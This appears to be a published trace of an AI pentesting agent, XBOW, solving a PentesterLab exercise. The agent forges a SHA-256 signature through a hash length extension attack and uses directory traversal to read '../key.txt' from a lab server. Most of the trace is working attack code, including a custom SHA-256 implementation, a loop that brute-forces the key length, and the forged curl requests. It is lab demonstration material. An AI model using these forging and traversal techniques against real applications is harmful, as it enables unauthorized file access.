XBOW Trace: Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack
To solve this PentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOW writes its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash extension attack—all without access to the tutorial given to human solvers.
Trace Details
Given that we've identified a link to access the source code, our next step should be to retrieve and examine this file. Understanding the application's source code will provide valuable insights into its functionality, potential vulnerabilities, and the implementation of the "Simple Sign 3000" algorithm.
$ cat trace/writing-a-customized-sha-256-implementation-for-a-hash-length-extension-attack/6.bash
$ curl "http://web:9292/getfile?filename=supersecret.rb&signature=2f809a4c69fcc0eb600c9119060baabfe9c657adc8e81776173f729fb756605f"Based on our reconnaissance, we've identified that the application uses a signature verification process to authenticate file access requests. The challenge description mentions a length extension attack, which is a type of cryptographic attack that can be used to bypass certain types of signature checks. Given that we need to access the 'key.txt' file, which is likely protected by this signature mechanism, our next logical step would be to attempt to exploit this vulnerability.
$ cat trace/writing-a-customized-sha-256-implementation-for-a-hash-length-extension-attack/12.bash
$ sudo apt-get update && sudo apt-get install -y hash_extenderSince the hash_extender tool is not available in the default Kali Linux repositories, we need to find an alternative method to perform a length extension attack on SHA256. We can implement this attack using Python, which is readily available on most systems. We'll use the 'pysha256' library, which allows us to perform SHA256 operations at a lower level, enabling us to implement the length extension attack.
$ cat trace/writing-a-customized-sha-256-implementation-for-a-hash-length-extension-attack/15.python
import hashlib
import struct
def sha256_padding(message_length):
padding = b'\x80'
padding += b'\x00' * ((56 - (message_length + 1) % 64) % 64)
padding += struct.pack('>Q', message_length * 8)
return padding
def length_extension_attack(original_hash, original_message, append_message, key_length):
h = [int(original_hash[i:i+8], 16) for i in range(0, 64, 8)]
padded_length = key_length + len(original_message)
padding = sha256_padding(padded_length)
new_message = original_message.encode() + padding + append_message.encode()
new_hash = hashlib.sha256()
new_hash._h = h
new_hash.update(append_message.encode())
new_hash.update(struct.pack('>Q', (key_length + len(new_message)) * 8))
return new_hash.hexdigest(), new_message[len(original_message):]
# Example usage
original_hash = "2f809a4c69fcc0eb600c9119060baabfe9c657adc8e81776173f729fb756605f"
original_message = "supersecret.rb"
append_message = "../key.txt"
key_length = 16 # We don't know the actual length, so we'll need to guess
new_hash, suffix = length_extension_attack(original_hash, original_message, append_message, key_length)
print(f"New hash: {new_hash}")
print(f"Suffix (hex): {suffix.hex()}")Given the challenges we've faced with external libraries and tools, we should implement the SHA256 length extension attack manually in Python. This approach will give us more control and understanding of the process, and it doesn't rely on external dependencies. We'll create a custom SHA256 implementation that allows us to manipulate the internal state, which is crucial for the length extension attack.
$ cat trace/writing-a-customized-sha-256-implementation-for-a-hash-length-extension-attack/21.python
import struct
import binascii
def right_rotate(value, shift):
return ((value >> shift) | (value << (32 - shift))) & 0xFFFFFFFF
def sha256_compress(state, chunk):
k = [
0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
]
w = [0] * 64
for i in range(16):
w[i] = struct.unpack('>I', chunk[i*4:(i+1)*4])[0]
for i in range(16, 64):
s0 = right_rotate(w[i-15], 7) ^ right_rotate(w[i-15], 18) ^ (w[i-15] >> 3)
s1 = right_rotate(w[i-2], 17) ^ right_rotate(w[i-2], 19) ^ (w[i-2] >> 10)
w[i] = (w[i-16] + s0 + w[i-7] + s1) & 0xFFFFFFFF
a, b, c, d, e, f, g, h = state
for i in range(64):
S1 = right_rotate(e, 6) ^ right_rotate(e, 11) ^ right_rotate(e, 25)
ch = (e & f) ^ ((~e) & g)
temp1 = (h + S1 + ch + k[i] + w[i]) & 0xFFFFFFFF
S0 = right_rotate(a, 2) ^ right_rotate(a, 13) ^ right_rotate(a, 22)
maj = (a & b) ^ (a & c) ^ (b & c)
temp2 = (S0 + maj) & 0xFFFFFFFF
h = g
g = f
f = e
e = (d + temp1) & 0xFFFFFFFF
d = c
c = b
b = a
a = (temp1 + temp2) & 0xFFFFFFFF
return [
(state[0] + a) & 0xFFFFFFFF,
(state[1] + b) & 0xFFFFFFFF,
(state[2] + c) & 0xFFFFFFFF,
(state[3] + d) & 0xFFFFFFFF,
(state[4] + e) & 0xFFFFFFFF,
(state[5] + f) & 0xFFFFFFFF,
(state[6] + g) & 0xFFFFFFFF,
(state[7] + h) & 0xFFFFFFFF
]
def sha256_pad(message):
ml = len(message) * 8
message += b'\x80'
message += b'\x00' * ((56 - (len(message) % 64)) % 64)
message += struct.pack('>Q', ml)
return message
def sha256(message):
if isinstance(message, str):
message = message.encode()
h0 = 0x6a09e667
h1 = 0xbb67ae85
h2 = 0x3c6ef372
h3 = 0xa54ff53a
h4 = 0x510e527f
h5 = 0x9b05688c
h6 = 0x1f83d9ab
h7 = 0x5be0cd19
state = [h0, h1, h2, h3, h4, h5, h6, h7]
padded_message = sha256_pad(message)
for i in range(0, len(padded_message), 64):
chunk = padded_message[i:i+64]
state = sha256_compress(state, chunk)
return ''.join(format(h, '08x') for h in state)
def length_extension_attack(original_hash, original_message, append_message, key_length):
state = [int(original_hash[i:i+8], 16) for i in range(0, 64, 8)]
padded_length = key_length + len(original_message)
padding = sha256_pad(b'A' * padded_length)[padded_length:]
new_message = original_message.encode() + padding + append_message.encode()
fake_message = b'A' * key_length + new_message
fake_padding = sha256_pad(fake_message)[len(fake_message):]
for i in range(0, len(append_message.encode() + fake_padding), 64):
chunk = (append_message.encode() + fake_padding)[i:i+64]
state = sha256_compress(state, chunk)
new_hash = ''.join(format(h, '08x') for h in state)
return new_hash, new_message[len(original_message):]
# Example usage
original_hash = "2f809a4c69fcc0eb600c9119060baabfe9c657adc8e81776173f729fb756605f"
original_message = "supersecret.rb"
append_message = "../key.txt"
for key_length in range(8, 32):
new_hash, suffix = length_extension_attack(original_hash, original_message, append_message, key_length)
encoded_suffix = binascii.hexlify(suffix).decode()
print(f"Key length: {key_length}")
print(f"New hash: {new_hash}")
print(f"Encoded suffix: {encoded_suffix}")
print(f"Curl command: curl \"http://web:9292/getfile?filename=supersecret.rb{encoded_suffix}&signature={new_hash}\"")
print("---")Now that we have successfully implemented the SHA256 length extension attack and generated a series of potential payloads, our next step should be to test these payloads against the target server. We'll use the curl commands generated by our script to attempt to retrieve the contents of the "../key.txt" file. We'll start with the payload for key length 16, as this was our initial assumption, and if it doesn't work, we can try the other key lengths.
$ cat trace/writing-a-customized-sha-256-implementation-for-a-hash-length-extension-attack/24.bash
$ curl "http://web:9292/getfile?filename=supersecret.rb80000000000000000000000000000000000000000000000000000000000001202e2e2f6b65792e747874&signature=5b8c282881247fe0b38b1b7d173bc55d055cc584721be752c8a80ce6bc89134a"Our previous attempt encountered a syntax error due to unexpected piping. We should modify our Python script to directly execute the curl command using the subprocess module. This approach will allow us to properly handle special characters and URL encoding, potentially bypassing server-side security measures. We'll also include verbose output (-v) in the curl command to get more information about the request and response.
$ cat trace/writing-a-customized-sha-256-implementation-for-a-hash-length-extension-attack/30.python
import urllib.parse
import subprocess
original_filename = 'supersecret.rb'
append_path = '../key.txt'
padding = '\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x20'
full_filename = original_filename + padding + append_path
encoded_filename = urllib.parse.quote(full_filename)
new_signature = '5b8c282881247fe0b38b1b7d173bc55d055cc584721be752c8a80ce6bc89134a'
curl_command = f'curl -v "http://web:9292/getfile?filename={encoded_filename}&signature={new_signature}"'
print("Executing command:", curl_command)
result = subprocess.run(curl_command, shell=True, capture_output=True, text=True)
print("STDOUT:")
print(result.stdout)
print("STDERR:")
print(result.stderr)Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack
To solve this PentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOW writes its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash extension attack—all without access to the tutorial given to human solvers.
